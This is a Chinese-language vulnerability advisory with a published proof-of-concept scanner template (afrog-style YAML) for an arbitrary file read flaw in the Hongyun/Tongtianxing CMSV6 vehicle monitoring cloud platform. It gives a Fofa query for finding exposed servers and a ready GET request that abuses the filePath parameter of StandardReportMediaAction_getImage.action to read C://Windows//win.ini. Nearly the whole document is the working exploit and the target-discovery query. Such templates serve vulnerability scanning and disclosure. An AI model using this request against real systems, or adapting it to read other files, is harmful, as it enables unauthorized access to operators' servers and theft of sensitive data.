漏洞描述
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运(通天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏洞。
Fofa: body="./open/webApi.html"||body="/808gps/"
hongyun-tongtianxing-cms-v6-fileread: 鸿运(通天星CMSV6车载)主动安全监控云平台任意文件读取
PoC代码[已公开]
id: hongyun-tongtianxing-cms-v6-fileread
info:
name: 鸿运(通天星CMSV6车载)主动安全监控云平台任意文件读取
author: zan8in
severity: high
verified: true
description: |-
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运(通天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏洞。
Fofa: body="./open/webApi.html"||body="/808gps/"
reference:
- https://mp.weixin.qq.com/s/7zORAmffAGKprFn7GAIleA
tags: hongyun,tongtianxing,cms,fileread
created: 2024/02/28
rules:
r0:
request:
method: GET
path: /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100
expression: response.status == 200 && response.body.bcontains(b"bit app support")
expression: r0()